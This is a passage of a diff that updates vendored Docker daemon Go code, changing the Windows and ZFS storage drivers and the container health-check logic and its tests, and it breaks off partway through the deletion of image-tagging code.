@@ -385,9 +415,15 @@ func (d *Driver) Put(id string) error { return nil } d.cacheMu.Lock() + _, exists := d.cache[rID] delete(d.cache, rID) d.cacheMu.Unlock() + // If the cache was not populated, then the layer was left unprepared and deactivated + if !exists { + return nil + } + if err := hcsshim.UnprepareLayer(d.info, rID); err != nil { return err } @@ -395,7 +431,31 @@ func (d *Driver) Put(id string) error { } // Cleanup ensures the information the driver stores is properly removed. +// We use this opportunity to cleanup any -removing folders which may be +// still left if the daemon was killed while it was removing a layer. func (d *Driver) Cleanup() error { + items, err := ioutil.ReadDir(d.info.HomeDir) + if err != nil { + if os.IsNotExist(err) { + return nil + } + return err + } + + // Note we don't return an error below - it's possible the files + // are locked. However, next time around after the daemon exits, + // we likely will be able to to cleanup successfully. Instead we log + // warnings if there are errors. + for _, item := range items { + if item.IsDir() && strings.HasSuffix(item.Name(), "-removing") { + if err := hcsshim.DestroyLayer(d.info, item.Name()); err != nil { + logrus.Warnf("Failed to cleanup %s: %s", item.Name(), err) + } else { + logrus.Infof("Cleaned up %s", item.Name()) + } + } + } + return nil } @@ -544,7 +604,7 @@ func (d *Driver) DiffSize(id, parent string) (size int64, err error) { } defer d.Put(id) - return archive.ChangesSize(layerFs, changes), nil + return archive.ChangesSize(layerFs.Path(), changes), nil } // GetMetadata returns custom driver information. @@ -724,7 +784,7 @@ func writeLayerReexec() { } // writeLayer writes a layer from a tar file. 
-func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths ...string) (int64, error) { +func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths ...string) (size int64, retErr error) { err := winio.EnableProcessPrivileges([]string{winio.SeBackupPrivilege, winio.SeRestorePrivilege}) if err != nil { return 0, err @@ -749,17 +809,17 @@ func writeLayer(layerData io.Reader, home string, id string, parentLayerPaths .. return 0, err } - size, err := writeLayerFromTar(layerData, w, filepath.Join(home, id)) - if err != nil { - return 0, err - } - - err = w.Close() - if err != nil { - return 0, err - } + defer func() { + if err := w.Close(); err != nil { + // This error should not be discarded as a failure here + // could result in an invalid layer on disk + if retErr == nil { + retErr = err + } + } + }() - return size, nil + return writeLayerFromTar(layerData, w, filepath.Join(home, id)) } // resolveID computes the layerID information based on the given id. @@ -775,11 +835,7 @@ func (d *Driver) resolveID(id string) (string, error) { // setID stores the layerId in disk. func (d *Driver) setID(id, altID string) error { - err := ioutil.WriteFile(filepath.Join(d.dir(id), "layerId"), []byte(altID), 0600) - if err != nil { - return err - } - return nil + return ioutil.WriteFile(filepath.Join(d.dir(id), "layerId"), []byte(altID), 0600) } // getLayerChain returns the layer chain information. @@ -829,14 +885,16 @@ func (fg *fileGetCloserWithBackupPrivileges) Get(filename string) (io.ReadCloser var f *os.File // Open the file while holding the Windows backup privilege. This ensures that the // file can be opened even if the caller does not actually have access to it according - // to the security descriptor. + // to the security descriptor. 
Also use sequential file access to avoid depleting the + // standby list - Microsoft VSO Bug Tracker #9900466 err := winio.RunWithPrivilege(winio.SeBackupPrivilege, func() error { path := longpath.AddPrefix(filepath.Join(fg.path, filename)) - p, err := syscall.UTF16FromString(path) + p, err := windows.UTF16FromString(path) if err != nil { return err } - h, err := syscall.CreateFile(&p[0], syscall.GENERIC_READ, syscall.FILE_SHARE_READ, nil, syscall.OPEN_EXISTING, syscall.FILE_FLAG_BACKUP_SEMANTICS, 0) + const fileFlagSequentialScan = 0x08000000 // FILE_FLAG_SEQUENTIAL_SCAN + h, err := windows.CreateFile(&p[0], windows.GENERIC_READ, windows.FILE_SHARE_READ, nil, windows.OPEN_EXISTING, windows.FILE_FLAG_BACKUP_SEMANTICS|fileFlagSequentialScan, 0) if err != nil { return &os.PathError{Op: "open", Path: path, Err: err} } @@ -878,8 +936,6 @@ func parseStorageOpt(storageOpt map[string]string) (*storageOptions, error) { return nil, err } options.size = uint64(size) - default: - return nil, fmt.Errorf("Unknown storage option: %s", key) } } return &options, nil diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go index 8e283ccf40..1d9153e171 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs.go @@ -1,6 +1,6 @@ -// +build linux freebsd solaris +// +build linux freebsd -package zfs +package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs" import ( "fmt" @@ -10,16 +10,17 @@ import ( "strconv" "strings" "sync" - "syscall" "time" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/containerfs" "github.com/docker/docker/pkg/idtools" "github.com/docker/docker/pkg/mount" "github.com/docker/docker/pkg/parsers" - zfs "github.com/mistifyio/go-zfs" - "github.com/opencontainers/runc/libcontainer/label" + "github.com/mistifyio/go-zfs" + 
"github.com/opencontainers/selinux/go-selinux/label" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) type zfsOptions struct { @@ -36,7 +37,7 @@ type Logger struct{} // Log wraps log message from ZFS driver with a prefix '[zfs]'. func (*Logger) Log(cmd []string) { - logrus.Debugf("[zfs] %s", strings.Join(cmd, " ")) + logrus.WithField("storage-driver", "zfs").Debugf("[zfs] %s", strings.Join(cmd, " ")) } // Init returns a new ZFS driver. @@ -45,14 +46,16 @@ func (*Logger) Log(cmd []string) { func Init(base string, opt []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) { var err error + logger := logrus.WithField("storage-driver", "zfs") + if _, err := exec.LookPath("zfs"); err != nil { - logrus.Debugf("[zfs] zfs command is not available: %v", err) + logger.Debugf("zfs command is not available: %v", err) return nil, graphdriver.ErrPrerequisites } file, err := os.OpenFile("/dev/zfs", os.O_RDWR, 600) if err != nil { - logrus.Debugf("[zfs] cannot open /dev/zfs: %v", err) + logger.Debugf("cannot open /dev/zfs: %v", err) return nil, graphdriver.ErrPrerequisites } defer file.Close() @@ -103,13 +106,10 @@ func Init(base string, opt []string, uidMaps, gidMaps []idtools.IDMap) (graphdri if err != nil { return nil, fmt.Errorf("Failed to get root uid/guid: %v", err) } - if err := idtools.MkdirAllAs(base, 0700, rootUID, rootGID); err != nil { + if err := idtools.MkdirAllAndChown(base, 0700, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { return nil, fmt.Errorf("Failed to create '%s': %v", base, err) } - if err := mount.MakePrivate(base); err != nil { - return nil, err - } d := &Driver{ dataset: rootDataset, options: options, @@ -141,19 +141,19 @@ func parseOptions(opt []string) (zfsOptions, error) { } func lookupZfsDataset(rootdir string) (string, error) { - var stat syscall.Stat_t - if err := syscall.Stat(rootdir, &stat); err != nil { + var stat unix.Stat_t + if err := unix.Stat(rootdir, &stat); err != nil { return "", fmt.Errorf("Failed 
to access '%s': %s", rootdir, err) } wantedDev := stat.Dev - mounts, err := mount.GetMounts() + mounts, err := mount.GetMounts(nil) if err != nil { return "", err } for _, m := range mounts { - if err := syscall.Stat(m.Mountpoint, &stat); err != nil { - logrus.Debugf("[zfs] failed to stat '%s' while scanning for zfs mount: %v", m.Mountpoint, err) + if err := unix.Stat(m.Mountpoint, &stat); err != nil { + logrus.WithField("storage-driver", "zfs").Debugf("failed to stat '%s' while scanning for zfs mount: %v", m.Mountpoint, err) continue // may fail on fuse file systems } @@ -180,7 +180,8 @@ func (d *Driver) String() string { return "zfs" } -// Cleanup is used to implement graphdriver.ProtoDriver. There is no cleanup required for this driver. +// Cleanup is called on daemon shutdown, it is a no-op for ZFS. +// TODO(@cpuguy83): Walk layer tree and check mounts? func (d *Driver) Cleanup() error { return nil } @@ -220,7 +221,10 @@ func (d *Driver) Status() [][2]string { // GetMetadata returns image/container metadata related to graph driver func (d *Driver) GetMetadata(id string) (map[string]string, error) { - return nil, nil + return map[string]string{ + "Mountpoint": d.mountPath(id), + "Dataset": d.zfsPath(id), + }, nil } func (d *Driver) cloneFilesystem(name, parentName string) error { @@ -353,41 +357,49 @@ func (d *Driver) Remove(id string) error { } // Get returns the mountpoint for the given id after creating the target directories if necessary. 
-func (d *Driver) Get(id, mountLabel string) (string, error) { +func (d *Driver) Get(id, mountLabel string) (_ containerfs.ContainerFS, retErr error) { mountpoint := d.mountPath(id) if count := d.ctr.Increment(mountpoint); count > 1 { - return mountpoint, nil - } + return containerfs.NewLocalContainerFS(mountpoint), nil + } + defer func() { + if retErr != nil { + if c := d.ctr.Decrement(mountpoint); c <= 0 { + if mntErr := unix.Unmount(mountpoint, 0); mntErr != nil { + logrus.WithField("storage-driver", "zfs").Errorf("Error unmounting %v: %v", mountpoint, mntErr) + } + if rmErr := unix.Rmdir(mountpoint); rmErr != nil && !os.IsNotExist(rmErr) { + logrus.WithField("storage-driver", "zfs").Debugf("Failed to remove %s: %v", id, rmErr) + } + + } + } + }() filesystem := d.zfsPath(id) options := label.FormatMountLabel("", mountLabel) - logrus.Debugf(`[zfs] mount("%s", "%s", "%s")`, filesystem, mountpoint, options) + logrus.WithField("storage-driver", "zfs").Debugf(`mount("%s", "%s", "%s")`, filesystem, mountpoint, options) rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps) if err != nil { - d.ctr.Decrement(mountpoint) - return "", err + return nil, err } // Create the target directories if they don't exist - if err := idtools.MkdirAllAs(mountpoint, 0755, rootUID, rootGID); err != nil { - d.ctr.Decrement(mountpoint) - return "", err + if err := idtools.MkdirAllAndChown(mountpoint, 0755, idtools.IDPair{UID: rootUID, GID: rootGID}); err != nil { + return nil, err } if err := mount.Mount(filesystem, mountpoint, "zfs", options); err != nil { - d.ctr.Decrement(mountpoint) - return "", fmt.Errorf("error creating zfs mount of %s to %s: %v", filesystem, mountpoint, err) + return nil, fmt.Errorf("error creating zfs mount of %s to %s: %v", filesystem, mountpoint, err) } // this could be our first mount after creation of the filesystem, and the root dir may still have root // permissions instead of the remapped root uid:gid (if user namespaces are enabled): if err 
:= os.Chown(mountpoint, rootUID, rootGID); err != nil { - mount.Unmount(mountpoint) - d.ctr.Decrement(mountpoint) - return "", fmt.Errorf("error modifying zfs mountpoint (%s) directory ownership: %v", mountpoint, err) + return nil, fmt.Errorf("error modifying zfs mountpoint (%s) directory ownership: %v", mountpoint, err) } - return mountpoint, nil + return containerfs.NewLocalContainerFS(mountpoint), nil } // Put removes the existing mountpoint for the given id if it exists. @@ -396,16 +408,18 @@ func (d *Driver) Put(id string) error { if count := d.ctr.Decrement(mountpoint); count > 0 { return nil } - mounted, err := graphdriver.Mounted(graphdriver.FsMagicZfs, mountpoint) - if err != nil || !mounted { - return err - } - logrus.Debugf(`[zfs] unmount("%s")`, mountpoint) + logger := logrus.WithField("storage-driver", "zfs") + + logger.Debugf(`unmount("%s")`, mountpoint) - if err := mount.Unmount(mountpoint); err != nil { - return fmt.Errorf("error unmounting to %s: %v", mountpoint, err) + if err := unix.Unmount(mountpoint, unix.MNT_DETACH); err != nil { + logger.Warnf("Failed to unmount %s mount %s: %v", id, mountpoint, err) } + if err := unix.Rmdir(mountpoint); err != nil && !os.IsNotExist(err) { + logger.Debugf("Failed to remove %s mount point %s: %v", id, mountpoint, err) + } + return nil } @@ -413,5 +427,5 @@ func (d *Driver) Put(id string) error { func (d *Driver) Exists(id string) bool { d.Lock() defer d.Unlock() - return d.filesystemsCache[d.zfsPath(id)] == true + return d.filesystemsCache[d.zfsPath(id)] } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go index 1c05fa794c..f15aae0596 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_freebsd.go @@ -1,23 +1,23 @@ -package zfs +package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs" import ( "fmt" 
"strings" - "syscall" - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver" + "github.com/sirupsen/logrus" + "golang.org/x/sys/unix" ) func checkRootdirFs(rootdir string) error { - var buf syscall.Statfs_t - if err := syscall.Statfs(rootdir, &buf); err != nil { + var buf unix.Statfs_t + if err := unix.Statfs(rootdir, &buf); err != nil { return fmt.Errorf("Failed to access '%s': %s", rootdir, err) } // on FreeBSD buf.Fstypename contains ['z', 'f', 's', 0 ... ] if (buf.Fstypename[0] != 122) || (buf.Fstypename[1] != 102) || (buf.Fstypename[2] != 115) || (buf.Fstypename[3] != 0) { - logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir) + logrus.WithField("storage-driver", "zfs").Debugf("no zfs dataset found for rootdir '%s'", rootdir) return graphdriver.ErrPrerequisites } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go index 52ed516049..589ecbd179 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_linux.go @@ -1,21 +1,22 @@ -package zfs +package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs" import ( - "fmt" - "syscall" - - "github.com/Sirupsen/logrus" "github.com/docker/docker/daemon/graphdriver" + "github.com/sirupsen/logrus" ) -func checkRootdirFs(rootdir string) error { - var buf syscall.Statfs_t - if err := syscall.Statfs(rootdir, &buf); err != nil { - return fmt.Errorf("Failed to access '%s': %s", rootdir, err) +func checkRootdirFs(rootDir string) error { + fsMagic, err := graphdriver.GetFSMagic(rootDir) + if err != nil { + return err + } + backingFS := "unknown" + if fsName, ok := graphdriver.FsNames[fsMagic]; ok { + backingFS = fsName } - if graphdriver.FsMagic(buf.Type) != graphdriver.FsMagicZfs { - logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir) + if fsMagic != graphdriver.FsMagicZfs { + 
logrus.WithField("root", rootDir).WithField("backingFS", backingFS).WithField("storage-driver", "zfs").Error("No zfs dataset found for root") return graphdriver.ErrPrerequisites } diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go deleted file mode 100644 index bb4a85bd64..0000000000 --- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_solaris.go +++ /dev/null @@ -1,59 +0,0 @@ -// +build solaris,cgo - -package zfs - -/* -#include -#include - -static inline struct statvfs *getstatfs(char *s) { - struct statvfs *buf; - int err; - buf = (struct statvfs *)malloc(sizeof(struct statvfs)); - err = statvfs(s, buf); - return buf; -} -*/ -import "C" -import ( - "path/filepath" - "strings" - "unsafe" - - "github.com/Sirupsen/logrus" - "github.com/docker/docker/daemon/graphdriver" -) - -func checkRootdirFs(rootdir string) error { - - cs := C.CString(filepath.Dir(rootdir)) - buf := C.getstatfs(cs) - - // on Solaris buf.f_basetype contains ['z', 'f', 's', 0 ... 
] - if (buf.f_basetype[0] != 122) || (buf.f_basetype[1] != 102) || (buf.f_basetype[2] != 115) || - (buf.f_basetype[3] != 0) { - logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", rootdir) - C.free(unsafe.Pointer(buf)) - return graphdriver.ErrPrerequisites - } - - C.free(unsafe.Pointer(buf)) - C.free(unsafe.Pointer(cs)) - return nil -} - -/* rootfs is introduced to comply with the OCI spec -which states that root filesystem must be mounted at /rootfs/ instead of / -*/ -func getMountpoint(id string) string { - maxlen := 12 - - // we need to preserve filesystem suffix - suffix := strings.SplitN(id, "-", 2) - - if len(suffix) > 1 { - return filepath.Join(id[:maxlen]+"-"+suffix[1], "rootfs", "root") - } - - return filepath.Join(id[:maxlen], "rootfs", "root") -} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go index 3e22928438..b5d6cb18c7 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_test.go @@ -1,6 +1,6 @@ // +build linux -package zfs +package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs" import ( "testing" @@ -27,7 +27,7 @@ func TestZfsCreateSnap(t *testing.T) { } func TestZfsSetQuota(t *testing.T) { - graphtest.DriverTestSetQuota(t, "zfs") + graphtest.DriverTestSetQuota(t, "zfs", true) } func TestZfsTeardown(t *testing.T) { diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go index ce8daadaf6..1b77030684 100644 --- a/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go +++ b/vendor/github.com/docker/docker/daemon/graphdriver/zfs/zfs_unsupported.go @@ -1,6 +1,6 @@ -// +build !linux,!freebsd,!solaris +// +build !linux,!freebsd -package zfs +package zfs // import "github.com/docker/docker/daemon/graphdriver/zfs" func 
checkRootdirFs(rootdir string) error { return nil diff --git a/vendor/github.com/docker/docker/daemon/health.go b/vendor/github.com/docker/docker/daemon/health.go index 5b01dc0f40..ae0d7f8921 100644 --- a/vendor/github.com/docker/docker/daemon/health.go +++ b/vendor/github.com/docker/docker/daemon/health.go @@ -1,21 +1,20 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "bytes" + "context" "fmt" "runtime" "strings" "sync" "time" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" "github.com/docker/docker/api/types" containertypes "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/strslice" "github.com/docker/docker/container" "github.com/docker/docker/daemon/exec" + "github.com/sirupsen/logrus" ) const ( @@ -30,6 +29,10 @@ const ( // than this, the check is considered to have failed. defaultProbeTimeout = 30 * time.Second + // The time given for the container to start before the health check starts considering + // the container unstable. Defaults to none. + defaultStartPeriod = 0 * time.Second + // Default number of consecutive failures of the health check // for the container to be considered unhealthy. defaultProbeRetries = 3 @@ -41,8 +44,7 @@ const ( const ( // Exit status codes that can be returned by the probe command. - exitStatusHealthy = 0 // Container is healthy - exitStatusUnhealthy = 1 // Container is unhealthy + exitStatusHealthy = 0 // Container is healthy ) // probe implementations know how to run a particular type of probe. @@ -60,30 +62,39 @@ type cmdProbe struct { // exec the healthcheck command in the container. 
// Returns the exit code and probe output (if any) -func (p *cmdProbe) run(ctx context.Context, d *Daemon, container *container.Container) (*types.HealthcheckResult, error) { - - cmdSlice := strslice.StrSlice(container.Config.Healthcheck.Test)[1:] +func (p *cmdProbe) run(ctx context.Context, d *Daemon, cntr *container.Container) (*types.HealthcheckResult, error) { + cmdSlice := strslice.StrSlice(cntr.Config.Healthcheck.Test)[1:] if p.shell { - cmdSlice = append(getShell(container.Config), cmdSlice...) + cmdSlice = append(getShell(cntr.Config), cmdSlice...) } entrypoint, args := d.getEntrypointAndArgs(strslice.StrSlice{}, cmdSlice) execConfig := exec.NewConfig() execConfig.OpenStdin = false execConfig.OpenStdout = true execConfig.OpenStderr = true - execConfig.ContainerID = container.ID + execConfig.ContainerID = cntr.ID execConfig.DetachKeys = []byte{} execConfig.Entrypoint = entrypoint execConfig.Args = args execConfig.Tty = false execConfig.Privileged = false - execConfig.User = container.Config.User + execConfig.User = cntr.Config.User + execConfig.WorkingDir = cntr.Config.WorkingDir + + linkedEnv, err := d.setupLinkedContainers(cntr) + if err != nil { + return nil, err + } + execConfig.Env = container.ReplaceOrAppendEnvValues(cntr.CreateDaemonEnvironment(execConfig.Tty, linkedEnv), execConfig.Env) - d.registerExecCommand(container, execConfig) - d.LogContainerEvent(container, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " ")) + d.registerExecCommand(cntr, execConfig) + attributes := map[string]string{ + "execID": execConfig.ID, + } + d.LogContainerEventWithAttributes(cntr, "exec_create: "+execConfig.Entrypoint+" "+strings.Join(execConfig.Args, " "), attributes) output := &limitedBuffer{} - err := d.ContainerExecStart(ctx, execConfig.ID, nil, output, output) + err = d.ContainerExecStart(ctx, execConfig.ID, nil, output, output) if err != nil { return nil, err } @@ -92,7 +103,7 @@ func (p *cmdProbe) run(ctx context.Context, d *Daemon, 
container *container.Cont return nil, err } if info.ExitCode == nil { - return nil, fmt.Errorf("Healthcheck for container %s has no exit code!", container.ID) + return nil, fmt.Errorf("healthcheck for container %s has no exit code", cntr.ID) } // Note: Go's json package will handle invalid UTF-8 for us out := output.String() @@ -121,7 +132,7 @@ func handleProbeResult(d *Daemon, c *container.Container, result *types.Healthch } h := c.State.Health - oldStatus := h.Status + oldStatus := h.Status() if len(h.Log) >= maxLogEntries { h.Log = append(h.Log[len(h.Log)+1-maxLogEntries:], result) @@ -131,18 +142,43 @@ func handleProbeResult(d *Daemon, c *container.Container, result *types.Healthch if result.ExitCode == exitStatusHealthy { h.FailingStreak = 0 - h.Status = types.Healthy - } else { - // Failure (including invalid exit code) - h.FailingStreak++ - if h.FailingStreak >= retries { - h.Status = types.Unhealthy + h.SetStatus(types.Healthy) + } else { // Failure (including invalid exit code) + shouldIncrementStreak := true + + // If the container is starting (i.e. we never had a successful health check) + // then we check if we are within the start period of the container in which + // case we do not increment the failure streak. + if h.Status() == types.Starting { + startPeriod := timeoutWithDefault(c.Config.Healthcheck.StartPeriod, defaultStartPeriod) + timeSinceStart := result.Start.Sub(c.State.StartedAt) + + // If still within the start period, then don't increment failing streak. + if timeSinceStart < startPeriod { + shouldIncrementStreak = false + } + } + + if shouldIncrementStreak { + h.FailingStreak++ + + if h.FailingStreak >= retries { + h.SetStatus(types.Unhealthy) + } } // Else we're starting or healthy. Stay in that state. 
} - if oldStatus != h.Status { - d.LogContainerEvent(c, "health_status: "+h.Status) + // replicate Health status changes + if err := c.CheckpointTo(d.containersReplica); err != nil { + // queries will be inconsistent until the next probe runs or other state mutations + // checkpoint the container + logrus.Errorf("Error replicating health state for container %s: %v", c.ID, err) + } + + current := h.Status() + if oldStatus != current { + d.LogContainerEvent(c, "health_status: "+current) } } @@ -160,7 +196,7 @@ func monitor(d *Daemon, c *container.Container, stop chan struct{}, probe probe) logrus.Debugf("Running health check for container %s ...", c.ID) startTime := time.Now() ctx, cancelProbe := context.WithTimeout(context.Background(), probeTimeout) - results := make(chan *types.HealthcheckResult) + results := make(chan *types.HealthcheckResult, 1) go func() { healthChecksCounter.Inc() result, err := probe.run(ctx, d, c) @@ -183,8 +219,10 @@ func monitor(d *Daemon, c *container.Container, stop chan struct{}, probe probe) select { case <-stop: logrus.Debugf("Stop healthcheck monitoring for container %s (received while probing)", c.ID) - // Stop timeout and kill probe, but don't wait for probe to exit. cancelProbe() + // Wait for probe to exit (it might take a while to respond to the TERM + // signal and we don't want dying probes to pile up). 
+ <-results return case result := <-results: handleProbeResult(d, c, result, stop) @@ -219,6 +257,8 @@ func getProbe(c *container.Container) probe { return &cmdProbe{shell: false} case "CMD-SHELL": return &cmdProbe{shell: true} + case "NONE": + return nil default: logrus.Warnf("Unknown healthcheck type '%s' (expected 'CMD') in container %s", config.Test[0], c.ID) return nil @@ -259,11 +299,11 @@ func (d *Daemon) initHealthMonitor(c *container.Container) { d.stopHealthchecks(c) if h := c.State.Health; h != nil { - h.Status = types.Starting + h.SetStatus(types.Starting) h.FailingStreak = 0 } else { h := &container.Health{} - h.Status = types.Starting + h.SetStatus(types.Starting) c.State.Health = h } diff --git a/vendor/github.com/docker/docker/daemon/health_test.go b/vendor/github.com/docker/docker/daemon/health_test.go index 7e82115d43..db166317fd 100644 --- a/vendor/github.com/docker/docker/daemon/health_test.go +++ b/vendor/github.com/docker/docker/daemon/health_test.go @@ -1,4 +1,4 @@ -package daemon +package daemon // import "github.com/docker/docker/daemon" import ( "testing" @@ -14,31 +14,36 @@ import ( func reset(c *container.Container) { c.State = &container.State{} c.State.Health = &container.Health{} - c.State.Health.Status = types.Starting + c.State.Health.SetStatus(types.Starting) } func TestNoneHealthcheck(t *testing.T) { c := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "container_id", - Name: "container_name", - Config: &containertypes.Config{ - Image: "image_name", - Healthcheck: &containertypes.HealthConfig{ - Test: []string{"NONE"}, - }, + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Image: "image_name", + Healthcheck: &containertypes.HealthConfig{ + Test: []string{"NONE"}, }, - State: &container.State{}, }, + State: &container.State{}, + } + store, err := container.NewViewDB() + if err != nil { + t.Fatal(err) + } + daemon := &Daemon{ + containersReplica: store, } - daemon := 
&Daemon{} daemon.initHealthMonitor(c) if c.State.Health != nil { - t.Errorf("Expecting Health to be nil, but was not") + t.Error("Expecting Health to be nil, but was not") } } +// FIXME(vdemeester) This takes around 3s… This is *way* too long func TestHealthStates(t *testing.T) { e := events.New() _, l, _ := e.Subscribe() @@ -57,16 +62,21 @@ func TestHealthStates(t *testing.T) { } c := &container.Container{ - CommonContainer: container.CommonContainer{ - ID: "container_id", - Name: "container_name", - Config: &containertypes.Config{ - Image: "image_name", - }, + ID: "container_id", + Name: "container_name", + Config: &containertypes.Config{ + Image: "image_name", }, } + + store, err := container.NewViewDB() + if err != nil { + t.Fatal(err) + } + daemon := &Daemon{ - EventsService: e, + EventsService: e, + containersReplica: store, } c.Config.Healthcheck = &containertypes.HealthConfig{ @@ -101,8 +111,8 @@ func TestHealthStates(t *testing.T) { handleResult(c.State.StartedAt.Add(20*time.Second), 1) handleResult(c.State.StartedAt.Add(40*time.Second), 1) - if c.State.Health.Status != types.Starting { - t.Errorf("Expecting starting, but got %#v\n", c.State.Health.Status) + if status := c.State.Health.Status(); status != types.Starting { + t.Errorf("Expecting starting, but got %#v\n", status) } if c.State.Health.FailingStreak != 2 { t.Errorf("Expecting FailingStreak=2, but got %d\n", c.State.Health.FailingStreak) @@ -115,4 +125,30 @@ func TestHealthStates(t *testing.T) { if c.State.Health.FailingStreak != 0 { t.Errorf("Expecting FailingStreak=0, but got %d\n", c.State.Health.FailingStreak) } + + // Test start period + + reset(c) + c.Config.Healthcheck.Retries = 2 + c.Config.Healthcheck.StartPeriod = 30 * time.Second + + handleResult(c.State.StartedAt.Add(20*time.Second), 1) + if status := c.State.Health.Status(); status != types.Starting { + t.Errorf("Expecting starting, but got %#v\n", status) + } + if c.State.Health.FailingStreak != 0 { + t.Errorf("Expecting 
FailingStreak=0, but got %d\n", c.State.Health.FailingStreak) + } + handleResult(c.State.StartedAt.Add(50*time.Second), 1) + if status := c.State.Health.Status(); status != types.Starting { + t.Errorf("Expecting starting, but got %#v\n", status) + } + if c.State.Health.FailingStreak != 1 { + t.Errorf("Expecting FailingStreak=1, but got %d\n", c.State.Health.FailingStreak) + } + handleResult(c.State.StartedAt.Add(80*time.Second), 0) + expect("health_status: healthy") + if c.State.Health.FailingStreak != 0 { + t.Errorf("Expecting FailingStreak=0, but got %d\n", c.State.Health.FailingStreak) + } } diff --git a/vendor/github.com/docker/docker/daemon/image.go b/vendor/github.com/docker/docker/daemon/image.go deleted file mode 100644 index 32a8d77432..0000000000 --- a/vendor/github.com/docker/docker/daemon/image.go +++ /dev/null @@ -1,76 +0,0 @@ -package daemon - -import ( - "fmt" - - "github.com/docker/docker/builder" - "github.com/docker/docker/image" - "github.com/docker/docker/pkg/stringid" - "github.com/docker/docker/reference" -) - -// ErrImageDoesNotExist is error returned when no image can be found for a reference. -type ErrImageDoesNotExist struct { - RefOrID string -} - -func (e ErrImageDoesNotExist) Error() string { - return fmt.Sprintf("no such id: %s", e.RefOrID) -} - -// GetImageID returns an image ID corresponding to the image referred to by -// refOrID. 
-func (daemon *Daemon) GetImageID(refOrID string) (image.ID, error) { - id, ref, err := reference.ParseIDOrReference(refOrID) - if err != nil { - return "", err - } - if id != "" { - if _, err := daemon.imageStore.Get(image.IDFromDigest(id)); err != nil { - return "", ErrImageDoesNotExist{refOrID} - } - return image.IDFromDigest(id), nil - } - - if id, err := daemon.referenceStore.Get(ref); err == nil { - return image.IDFromDigest(id), nil - } - - // deprecated: repo:shortid https://github.com/docker/docker/pull/799 - if tagged, ok := ref.(reference.NamedTagged); ok { - if tag := tagged.Tag(); stringid.IsShortID(stringid.TruncateID(tag)) { - if id, err := daemon.imageStore.Search(tag); err == nil { - for _, namedRef := range daemon.referenceStore.References(id.Digest()) { - if namedRef.Name() == ref.Name() { - return id, nil - } - } - } - } - } - - // Search based on ID - if id, err := daemon.imageStore.Search(refOrID); err == nil { - return id, nil - } - - return "", ErrImageDoesNotExist{refOrID} -} - -// GetImage returns an image corresponding to the image referred to by refOrID. -func (daemon *Daemon) GetImage(refOrID string) (*image.Image, error) { - imgID, err := daemon.GetImageID(refOrID) - if err != nil { - return nil, err - } - return daemon.imageStore.Get(imgID) -} - -// GetImageOnBuild looks up a Docker image referenced by `name`. 
-func (daemon *Daemon) GetImageOnBuild(name string) (builder.Image, error) { - img, err := daemon.GetImage(name) - if err != nil { - return nil, err - } - return img, nil -} diff --git a/vendor/github.com/docker/docker/daemon/image_tag.go b/vendor/github.com/docker/docker/daemon/image_tag.go deleted file mode 100644 index 36fa3b462e..0000000000 --- a/vendor/github.com/docker/docker/daemon/image_tag.go +++ /dev/null @@ -1,37 +0,0 @@ -package daemon - -import ( - "github.com/docker/docker/image" - "github.com/docker/docker/reference" -) - -// TagImage creates the tag specified by newTag, pointing to the image named -// imageName (alternatively, imageName can also be an image ID). -func (daemon *Daemon) TagImage(imageName, repository, tag string) error { - imageID, err := daemon.GetImageID(imageName) - if err != nil { - return err - } - - newTag, err := reference.WithName(repository) - if err != nil { - return err - } - if tag != "" { - if newTag, err = reference.WithTag(newTag, tag); err != nil { - return err - } - } - - return daemon.TagImageWithReference(imageID, newTag) -} - -// TagImageWithReference adds the given reference to the image ID provided. -func (daemon *Daemon) TagImageWithReference(imageID image.ID, 